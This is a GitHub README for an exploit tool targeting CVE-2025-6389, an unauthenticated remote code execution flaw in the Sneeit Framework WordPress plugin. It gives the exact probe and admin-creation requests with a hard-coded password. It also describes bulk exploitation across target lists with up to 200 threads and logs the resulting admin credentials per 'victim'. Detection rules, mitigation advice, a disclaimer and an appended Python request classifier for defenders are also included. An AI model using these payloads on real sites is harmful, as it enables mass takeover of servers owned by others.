Nxploited/CVE-2025-6389

GitHub: Nxploited/CVE-2025-6389

This tool is an unauthenticated RCE exploit script for CVE-2025-6389, targeting the Sneeit Framework plugin, which can be invoked maliciously without any authentication and lead to full server compromise.

Stars: 0 | Forks: 0

# CVE-2025-6389 Sneeit Framework <= 8.3 - Unauthenticated Remote Code Execution (sneeit_articles_pagination_callback)
[![Telegram](https://img.shields.io/badge/Telegram-KNxploited-2CA5E0?style=for-the-badge&logo=telegram&logoColor=white)](https://t.me/KNxploited) [![CVE](https://img.shields.io/badge/CVE-2025--6389-critical?style=for-the-badge&logo=cve&logoColor=white&color=CC0000)](https://www.cve.org/CVERecord?id=CVE-2025-6389) [![CVSS](https://img.shields.io/badge/CVSS-9.8%20CRITICAL-red?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2025-6389) [![Python](https://img.shields.io/badge/Python-3.8%2B-blue?style=for-the-badge&logo=python&logoColor=white)](https://python.org) [![License](https://img.shields.io/badge/License-Educational%20Only-yellow?style=for-the-badge)](#%EF%B8%8F-disclaimer)
## 🧠 Overview

**CVE-2025-6389** is a **CVSS 9.8 Critical** remote code execution vulnerability in the **Sneeit Framework** plugin for WordPress. The flaw lies in the `sneeit_articles_pagination_callback()` function, which blindly passes **user-supplied input** to PHP's `call_user_func()`: an unauthenticated attacker can invoke arbitrary PHP functions with arbitrary arguments, including `wp_insert_user`, effectively gaining **full administrator privileges** or executing arbitrary server-side code.

| Field | Details |
|----------------------|----------------------------------------------|
| **CVE ID** | CVE-2025-6389 |
| **Plugin** | Sneeit Framework (`sneeit-framework`) |
| **Affected Versions** | All versions **8.3 and below** |
| **Vulnerability Type** | Remote Code Execution (RCE) |
| **Attack Vector** | Network (no authentication required) |
| **CVSS 3.1 Score** | **9.8 Critical** |
| **CVSS Vector** | `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **Impact** | Full server compromise / admin takeover |
| **Researcher** | Nxploited |

## 💀 Vulnerability Deep Dive

The root cause is the misuse of PHP's `call_user_func()` in the plugin's AJAX handler:

```
// Registered without authentication check
add_action('wp_ajax_nopriv_sneeit_articles_pagination', 'sneeit_articles_pagination_callback');

function sneeit_articles_pagination_callback() {
    $callback = $_POST['callback'];                              // ← User-controlled function name
    $args     = json_decode(stripslashes($_POST['args']), true); // ← User-controlled args

    // Calling ANY PHP function with ANY arguments — zero validation
    $result = call_user_func($callback, ...$args);
    echo $result;
    die();
}
```

**Why this is critical:**

- `wp_ajax_nopriv_*` = **reachable by anyone, no login required**
- `call_user_func($callback, $args)` = arbitrary function call
- An attacker can call `var_dump`, `system`, `wp_insert_user`, `eval`, or any PHP/WordPress function
- The response is returned directly, enabling **both blind and verbose-output RCE**

## ⚔️ Attack Chain

```
Step 1 — Probe / Fingerprint
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = var_dump
  args     = ["test"]

Expected Response → array(1) { [0]=> string(4) "test" }
        ↓
Confirms: call_user_func() is reachable and reflecting output

──────────────────────────────────────────────────────────────────
Step 2 — Admin Account Creation
──────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
  action   = sneeit_articles_pagination
  callback = wp_insert_user
  args     = {"user_login":"Nxploited_XXXX", "user_pass":"xplpass",
              "user_email":"...", "role":"administrator"}

Result → New administrator account silently created on target
        ↓
Full WordPress admin panel access achieved ✔️
```

## ⚙️ Requirements

```
pip install requests rich
```

| Dependency | Purpose |
|-------------|-------------------------------------------|
| `requests` | HTTP requests with session/proxy support |
| `rich` | Live terminal dashboard, panels and progress bars |
| `threading` | Concurrent multi-target processing |
| `queue` | Thread-safe target distribution |

## 📂 File Structure

```
CVE-2025-6389/
├── CVE-2025-6389.py        # Main exploit script
├── list.txt                # Target URLs — one per line
├── success_results.txt     # Auto-generated: successful targets + credentials
└── debug_responses/        # Auto-generated: raw server responses for debugging
    └── <target>.resp.txt
```

## 🚀 Usage

### Step 1 — Prepare Targets

Create `list.txt` with one URL per line:

```
https://target1.com
https://target2.com
http://target3.com
```

### Step 2 — Run the Exploit

```
python CVE-2025-6389.py
```

You will be prompted for:

```
Targets file name (default list.txt): list.txt
Number of threads (default 10): 20
```

### Step 3 — Live Dashboard

The script launches a **live Rich dashboard** showing:

```
┌─────────────────────────────────────────────────────────────────────┐
│ [ASCII BANNER]                                                      │
├──────────────────────────────┬──────────────────────────────────────┤
│ Info                         │ Stats                                │
│ Usage: Put targets in...     │ Total Targets: 150                   │
│ Threads: 20                  │ Processed: 87                        │
│ Password: xplpass            │ Successes: 12                        │
│ Success Log: success...      │ Failures: 75                         │
│ Debug Dir: debug_responses   │ Elapsed: 00:01:43                    │
├──────────────────────────────┴──────────────────────────────────────┤
│ Recent Results                                                      │
│ Time       Target                  Result                           │
│ 14:23:01   https://victim.com      SUCCESS                          │
│ 14:23:03   https://example.net     FAIL                             │
└─────────────────────────────────────────────────────────────────────┘
```

### Step 4 — Review Results

**Successful exploits** are saved to `success_results.txt`:

```
https://victim.com | USER: Nxploited_4821 | PASS: xplpass | EMAIL: Nxploited_4821@gmail.com
```

**Debug responses** (for failed targets) are saved under `debug_responses/`:

```
debug_responses/
└── https___victim.com.resp.txt   ← Raw server response for analysis
```

## 🖥️ Script Parameter Reference

| Prompt | Default | Description |
|---------------------|---------------------|-----------------------------------------------|
| Targets file | `list.txt` | File containing the target URLs |
| Threads | `10` (max: `200`) | Number of concurrent worker threads; increase for bulk scanning |
| Password | `xplpass` (hard-coded) | Password of the created admin account |
| Username format | `Nxploited_XXXX` | Auto-generated with a random 4-digit suffix |

## 📊 Detection Signatures

This exploit produces the following network signature, which is useful for defenders and WAF rule writers:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=sneeit_articles_pagination&callback=<function>&args=<json>
```

**WAF / IDS rule (pseudocode):**

```
IF request.method == POST
   AND request.path == "/wp-admin/admin-ajax.php"
   AND request.body CONTAINS "sneeit_articles_pagination"
   AND request.body CONTAINS "callback"
THEN BLOCK + ALERT
```

## 🛡️ Mitigation & Remediation

If you are a **site owner, developer or defender**, take the following steps immediately:

- ✅ **Update** Sneeit Framework to a version **above 8.3** (if a patch is available)
- ✅ **Deactivate and remove** the plugin until a fix is confirmed
- ✅ **Audit** recently created WordPress administrator accounts for unauthorized entries
- ✅ **Implement** server-side input validation; never pass user input to `call_user_func()`
- ✅ **Block** unauthenticated POST requests to `admin-ajax.php` at the WAF/firewall layer
- ✅ **Monitor** server logs for invocations of the `sneeit_articles_pagination` AJAX action
- ✅ **Enable** two-factor authentication on all existing admin accounts as an interim safeguard

## ⚠️ Disclaimer

```
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION TESTING,
AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, running, or modifying this script, you explicitly agree:

  • You have EXPLICIT, WRITTEN authorization from the owner of every system
    you test. No exceptions.
  • You are operating within a controlled lab environment or during a
    formally scoped and authorized engagement.
  • You will NOT deploy this tool against any system, network, or
    infrastructure you do not have legal permission to test.
  • Nxploited and all contributors assume ZERO liability for any unauthorized
    use, damage, data loss, legal action, or criminal prosecution arising
    from the use of this tool.

Unauthorized use of this exploit is a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — And all equivalent national and international cybercrime laws.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
```

## 👤 Author

| | |
|---------------|----------------------------------------------------------------|
| **Handle** | Nxploited (Khaled Alenazi) |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
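As an added defender-side example, not part of the Nxploited tool or the Sneeit plugin, the WAF/IDS pseudocode from the Detection Signatures section above is implemented below as Python detection logic and run over constructed sample requests shaped like the attack chain. The severity tiers (probe / medium / high) and the `role=administrator` check on the decoded `args` are this example's own additions; the callback names it looks for are the ones the README lists.

```python
import json
from urllib.parse import parse_qs
# Callback names the README cites: var_dump is the Step 1 probe, the rest give admin/RCE.
PROBE_CALLBACKS = {"var_dump"}
HIGH_RISK_CALLBACKS = {"wp_insert_user", "system", "eval"}

def classify_request(method, path, body):
    """Apply the README's WAF rule to one (method, path, body) record; None if no match."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/wp-admin/admin-ajax.php":
        return None
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") != "sneeit_articles_pagination":
        return None
    callback = params.get("callback")
    if callback is None:
        # No callback parameter: the rule does not block this, so log it only.
        return {"callback": None, "severity": "info", "admin_role": False}
    try:
        args = json.loads(params.get("args") or "null")
    except json.JSONDecodeError:
        args = None
    # The Step 2 payload asks wp_insert_user for role=administrator; flag that explicitly.
    admin_role = isinstance(args, dict) and args.get("role") == "administrator"
    if callback in HIGH_RISK_CALLBACKS or admin_role:
        severity = "high"
    elif callback in PROBE_CALLBACKS:
        severity = "probe"
    else:
        severity = "medium"  # any other caller-chosen name still reaches call_user_func()
    return {"callback": callback, "severity": severity, "admin_role": admin_role}

# Constructed sample records (not captured traffic) shaped like the README's attack chain.
SAMPLE_REQUESTS = [
    ("POST", "/wp-admin/admin-ajax.php",
     "action=sneeit_articles_pagination&callback=var_dump&args=%5B%22test%22%5D"),
    ("POST", "/wp-admin/admin-ajax.php",
     "action=sneeit_articles_pagination&callback=wp_insert_user"
     "&args=%7B%22user_login%22%3A%22x%22%2C%22role%22%3A%22administrator%22%7D"),
    ("POST", "/wp-admin/admin-ajax.php", "action=heartbeat&_nonce=deadbeef"),
    ("GET", "/wp-admin/admin-ajax.php?action=sneeit_articles_pagination&callback=var_dump", ""),
]
def scan(records):
    """Return [(index, classification)] for every record the rule would block and alert on."""
    hits = []
    for i, (method, path, body) in enumerate(records):
        result = classify_request(method, path, body)
        if result is not None and result["severity"] != "info":
            hits.append((i, result))
    return hits
```

Legitimate pagination traffic from the theme may also carry a `callback` parameter, which is why the example tiers severity instead of treating every match identically.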
Crafted by Nxploited · Authorized security research only · CVSS 9.8 Critical
Tags: call_user_func, CVE-2025-6389, CVSS 9.8, OpenVAS, PHP, RCE, Sneeit Framework, WordPress, WordPress security, protocol analysis, callback functions, threat simulation, plugin security, OS monitoring, unauthenticated attack, privilege escalation, vulnerability analysis, programming tools, path probing, remote code execution, reverse-engineering tools